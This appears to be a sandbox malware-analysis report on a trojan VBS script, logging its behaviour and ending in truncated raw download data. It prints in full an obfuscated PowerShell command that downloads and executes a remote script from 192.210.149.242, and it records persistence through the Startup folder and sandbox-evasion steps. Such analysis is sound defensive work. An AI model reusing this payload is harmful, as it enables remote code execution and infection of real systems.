NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

RegAsm.exe tried to sleep 226 seconds, actually delayed analysis time by 226 seconds

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\bb17803d-4384-4bab-809b-c199792eadf6\AgileDotNetRT.dll
file	C:\Users\test22\AppData\Local\Temp\97c2e543-1829-4fd6-91a1-35d2e827242f\AgileDotNetRT.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
cmdline	Powershell $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
cmdline	Powershell Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\97c2e543-1829-4fd6-91a1-35d2e827242f\AgileDotNetRT.dll

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_PingStatus where ((Address='google.com') And TimeToLive=80 And BufferSize=32)

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 20, 2022, 10:07 a.m.	show_type: 0 filepath_r: Powershell parameters: $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P filepath: Powershell	1	1	0
ShellExecuteExW May 20, 2022, 10:07 a.m.	show_type: 0 filepath_r: Powershell parameters: Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs' filepath: Powershell	1	1	0

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Kaspersky	HEUR:Trojan.Script.Generic
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
Microsoft	Trojan:Script/Wacatac.B!ml

Moves the original executable to a new location (1 event)

Time & API	Arguments	Status	Return	Repeated
MoveFileWithProgressW May 20, 2022, 10:07 a.m.	newfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs flags: 2 oldfilepath_r: C:\Users\test22\AppData\Local\Temp\edi.vbs newfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs oldfilepath: C:\Users\test22\AppData\Local\Temp\edi.vbs	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 20, 2022, 10:07 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	7C,>_8E,>_D2,>_C0,>_24,>_62,>_19,>_C6,>_6A,>_B1,>_98,>_F3,>_C5,>_83,>_47,>_7F,>_F9,>_FA,>_B5,>_0F,>_C5,>_4F,>_91,>_4F,>_8C,>_8D,>_91,>_1A,>_9F,>_1C,>_91,>_32,>_11,>_6F,>_49,>_27,>_BE,>_01,>_E9,>_EF,>_45,>_6A,>_A3,>_09,>_BE,>_9D,>_A2,>_B5,>_9F,>_42,>_53,>_E0,>_87,>_29,>_9A,>_67,>_29,>_34,>_2C,>_03,>_7B,>_75,>_1C,>_DE,>_59,>_1C,>_79,>_F8,>_04,>_6A,>_17,>_4C,>_62,>_8D,>_C7,>_56,>_C1,>_39,>_2A,>_38,>_57,>_05,>_D7,>_57,>_C1,>_7B,>_A8,>_E0,>_06,>_2A,>_B8,>_A1,>_0A,>_6E,>_A4,>_82,>_1B,>_AB,>_E0,>_26,>_2A,>_B8,>_A9,>_0A,>_6E,>_A6,>_82,>_9B,>_AB,>_E0,>_16,>_2A,>_78,>_4F,>_15,>_9C,>_A7,>_82,>_5B,>_AA,>_E0,>_56,>_2A,>_B8,>_B5,>_0A,>_DE,>_4B,>_05,>_B7,>_51,>_C1,>_7B,>_AB,>_E0,>_B6,>_2A,>_B8,>_9D,>_0A,>_6E,>_AF,>_82,>_F7,>_51,>_C1,>_FB,>_AA,>_E0,>_FD,>_54,>_70,>_07,>_15,>_DC,>_51,>_05,>_EF,>_AF,>_82,>_3B,>_A9,>_E0,>_CE,>_2A,>_B8,>_8B,>_0A,>_EE,>_AA,>_82,>_BB,>_A9,>_E0,>_EE,>_2A,>_B8,>_87,>_0A,>_EE,>_A9,>_82,>_7B,>_75,>_E1,>_FE,>_D1,>_43,>_FC,>_29,>_CA,>_13,>_04,>_3E,>_9B,>_4F,>_71,>_71,>_74,>_72,>_74,>_77,>_F2,>_74,>_C1,>_E2,>_70,>_DE,>_86,>_78,>_44,>_4E,>_60,>_66,>_EB,>_1C,>_84,>_56,>_C1,>_7B,>_3A,>_B8,>_DA,>_3A,>_5A,>_2E,>_15,>_A7,>_4F,>_94,>_61,>_09,>_23,>_18,>_86,>_13,>_6C,>_6C,>_D6,>_23,>_A3,>_51,>_A8,>_BB,>_E2,>_EE,>_62,>_1D,>_32,>_32,>_0C,>_92,>_13,>_8A,>_05,>_FA,>_0D,>_6C,>_7E,>_D6,>_FE,>_A9,>_92,>_CE,>_CB,>_13,>_88,>_52,>_46,>_F7,>_58,>_67,>_AE,>_8E,>_4F,>_44,>_1F,>_28,>_AE,>_C8,>_40,>_71,>_96,>_87,>_18,>_47,>_B0,>_9F,>_23,>_3E,>_3E,>_1B,>_01,>_03,>_47,>_11,>_9C,>_89,>_C8,>_85,>_C0,>_82,>_8C,>_04,>_21,>_38,>_1E,>_21,>_38,>_09,>_91,>_FB,>_20,>_7E,>_E3,>_B3,>_31,>_6E,>_4B,>_57,>_16,>_AA,>_B2,>_4E,>_71,>_C6,>_EA,>_9C,>_95,>_1A,>_CC,>_AB,>_17,>_40,>_4F,>_34,>_08,>_60,>_10,>_8A,>_01,>_28,>_27,>_78,>_36,>_81,>_73,>_09,>_5C,>_82,>_36,>_03,>_AC,>_43,>_37,>_00,>_3E,>_41,>_1D,>_00,>_35,>_28,>_5C,>_8A,>_1A,>_B2,>_A1,>_E0,>_B6,>_FE,>_14,>_DC,>_6A,>_1C,>_E1,>_24,>_13,>_28,>_A3,>_E4,>_02,>_2C,>_21,>_B0,>_8C,>_82,>_35,>_54,>_10,>_B8,>_8E,>_F2,>_0B,>_70,>_CE,>_10,>_BC,>_89,>_C0,>_56,>_22,>_DF,>_41,>_F0,>_4F,>_04,>_6A,>_53,>_31,>_B4,>_A0,>_62,>_9D,>_83,>_08,>_8C,>_A7,>_F6,>_42,>_32,>_94,>_41,>_C5,>_A3,>_9D,>_49,>_C5,>_F2,>_15,>_04,>_FE,>_4A,>_E0,>_39,>_02,>_1F,>_12,>_88,>_68,>_18,>_9A,>_D2,>_F0,>_68,>_ED,>_09,>_1E,>_4C,>_C3,>_DA,>_62,>_09,>_14,>_11,>_28,>_A3,>_E1,>_51,>_E5,>_10,>_38,>_97,>_56,>_49,>_53,>_43,>_07,>_09,>_3C,>_4B,>_7B,>_0C,>_90,>_42,>_C7,>_32,>_2C,>_BA,>_1E,>_5D,>_0D,>_59,>_D2,>_B1,>_4C,>_6F,>_02,>_DD,>_08,>_1C,>_44,>_60,>_00,>_1D,>_4B,>_8E,>_A4,>_E3,>_56,>_49,>_04,>_66,>_11,>_CE,>_5C,>_82,>_AF,>_21,>_F8,>_CF,>_44,>_CF,>_1E,>_3A,>_1E,>_C9,>_21,>_82,>_9F,>_26,>_F0,>_1A,>_1D,>_5B,>_EC,>_3E,>_81,>_CF,>_08,>_47,>_61,>_79,>_85,>_3D,>_11,>_03,>_43,>_26,>_63,>_50,>_97,>_17,>_F4,>_19,>_DD,>_56,>_55,>_E8,>_B4,>_20,>_9C,>_7E,>_0C,>_1F,>_86,>_1A,>_1A,>_41,>_A0,>_C2,>_53,>_E3,>_08,>_3F,>_85,>_D1,>_6D,>_CF,>_4C,>_A2,>_67,>_1A,>_81,>_F9,>_04,>_2A,>_7A,>_54,>_78,>_6A,>_01,>_69,>_BB,>_94,>_C0,>_35,>_A4,>_B6,>_1A,>_DA,>_6A,>_A0,>_03,>_8C,>_06,>_86,>_06,>_7A,>_C6,>_60,>_A8,>_69,>_20,>_53,>_35,>_0C,>_9D,>_D4,>_82,>_00,>_26,>_A8,>_4D,>_03,>_B8,>_80,>_C0,>_55,>_6A,>_9B,>_00,>_1E,>_20,>_F0,>_3C,>_40,>_1D,>_D4,>_A8,>_F6,>_07,>_C0,>_1E,>_4C,>_0B,>_A6,>_0E,>_F2,>_65,>_62,>_9C,>_CF,>_1C,>_03,>_78,>_2E,>_73,>_19,>_C0,>_9F,>_09,>_3C,>_CD,>_BC,>_C1,>_E4,>_20,>_AA,>_F2,>_C0,>_A7,>_C7,>_52,>_8D,>_43,>_63,>_96,>_2D,>_6B,>_0E,>_85,>_A2,>_8C,>_4E,>_67,>_A0,>_E6,>_01,>_05,>_71,>_4B,>_D1,>_43,>_BE,>_40,>_A9,>_83,>_9C,>_1A,>_62,>_80,>_70,>_30,>_0B,>_C7
Data received	00,>_18,>_AE,>_F5,>_26,>_58,>_22,>_48,>_7B,>_C3,>_3F,>_4F,>_28,>_2E,>_64,>_0E,>_42,>_18,>_97,>_07,>_A2,>_98,>_F2,>_61,>_74,>_62,>_D0,>_0D,>_FE,>_82,>_DE,>_E5,>_68,>_18,>_60,>_10,>_1E,>_78,>_C6,>_61,>_02,>_68,>_E7,>_04,>_B2,>_5E,>_A0,>_3B,>_11,>_5A,>_3A,>_40,>_71,>_03,>_4E,>_02,>_E9,>_25,>_09,>_FE,>_25,>_92,>_5E,>_92,>_80,>_83,>_6B,>_DD,>_A1,>_2D,>_C6,>_F0,>_48,>_04,>_D0,>_A3,>_10,>_7A,>_70,>_06,>_9C,>_D2,>_F3,>_3F,>_F7,>_E2,>_01,>_9A,>_3A,>_6D,>_A2,>_B0,>_48,>_3C,>_B1,>_96,>_62,>_C6,>_48,>_37,>_1A,>_F4,>_3A,>_2B,>_8B,>_13,>_A2,>_18,>_8E,>_47,>_61,>_E0,>_05,>_31,>_B4,>_16,>_43,>_1F,>_D8,>_42,>_D3,>_B0,>_ED,>_4C,>_FF,>_99,>_AF,>_D0,>_3E,>_1E,>_F1,>_81,>_1F,>_84,>_B2,>_48,>_3D,>_E2,>_7E,>_4B,>_13,>_99,>_88,>_1F,>_51,>_30,>_70,>_5C,>_51,>_00,>_50,>_6E,>_D0,>_5B,>_20,>_F4,>_17,>_08,>_3C,>_6F,>_82,>_E1,>_59,>_7B,>_92,>_79,>_7B,>_13,>_BB,>_07,>_92,>_D1,>_F8,>_13,>_59,>_4F,>_E0,>_F0,>_61,>_96,>_2E,>_50,>_E7,>_01,>_ED,>_67,>_20,>_0A,>_0D,>_7F,>_8D,>_D3,>_C9,>_BE,>_F5,>_5A,>_4B,>_BF,>_FD,>_43,>_B6,>_FD,>_D4,>_FA,>_47,>_CA,>_D8,>_14,>_09,>_42,>_AC,>_3D,>_D3,>_E2,>_47,>_19,>_BB,>_DD,>_9B,>_C3,>_DA,>_3E,>_78,>_FC,>_4C,>_F6,>_55,>_0D,>_1F,>_B5,>_1E,>_1C,>_23,>_0A,>_47,>_4B,>_F1,>_62,>_31,>_C9,>_2B,>_AF,>_4C,>_41,>_EA,>_53,>_2D,>_10,>_C1,>_B8,>_08,>_2A,>_F2,>_AA,>_E0,>_4D,>_E5,>_62,>_4E,>_04,>_55,>_47,>_47,>_F1,>_A2,>_D2,>_10,>_74,>_C6,>_43,>_14,>_3A,>_42,>_1C,>_2D,>_0C,>_58,>_0C,>_00,>_79,>_65,>_18,>_D5,>_A7,>_F3,>_28,>_54,>_33,>_A8,>_65,>_D1,>_79,>_88,>_C3,>_06,>_44,>_87,>_A9,>_47,>_A1,>_58,>_20,>_0B,>_C4,>_74,>_A2,>_50,>_28,>_7A,>_16,>_08,>_2A,>_B8,>_F8,>_53,>_77,>_8E,>_25,>_06,>_36,>_0C,>_44,>_A1,>_70,>_6C,>_30,>_CA,>_53,>_43,>_54,>_8A,>_8E,>_39,>_03,>_E3,>_DE,>_6A,>_88,>_62,>_CE,>_30,>_67,>_C0,>_8B,>_63,>_CF,>_19,>_C3,>_84,>_1A,>_0E,>_9F,>_C3,>_07,>_61,>_0E,>_5F,>_47,>_13,>_51,>_39,>_7C,>_C5,>_90,>_74,>_88,>_1C,>_54,>_21,>_1A,>_C7,>_5E,>_C1,>_52,>_40,>_CE,>_18,>_2C,>_6B,>_AF,>_03,>_2D,>_39,>_F6,>_66,>_1C,>_11,>_83,>_47,>_A5,>_98,>_19,>_69,>_F0,>_68,>_9C,>_DC,>_D5,>_46,>_9C,>_DC,>_2A,>_33,>_35,>_1E,>_F4,>_9B,>_BB,>_1A,>_C6,>_CB,>_32,>_02,>_40,>_31,>_53,>_E7,>_51,>_81,>_C6,>_55,>_74,>_44,>_31,>_D2,>_61,>_20,>_AA,>_91,>_91,>_0E,>_A0,>_2C,>_23,>_98,>_B0,>_11,>_1E,>_81,>_19,>_27,>_F7,>_15,>_30,>_28,>_30,>_37,>_8A,>_19,>_56,>_C0,>_61,>_B3,>_7B,>_80,>_62,>_AA,>_99,>_19,>_03,>_08,>_7B,>_33,>_16,>_C0,>_BC,>_6C,>_F8,>_CF,>_E4,>_D1,>_CC,>_CC,>_CC,>_CC,>_09,>_9B,>_0D,>_92,>_54,>_8E,>_B7,>_99,>_0E,>_8B,>_47,>_67,>_99,>_99,>_33,>_58,>_2C,>_40,>_28,>_04,>_81,>_6A,>_73,>_86,>_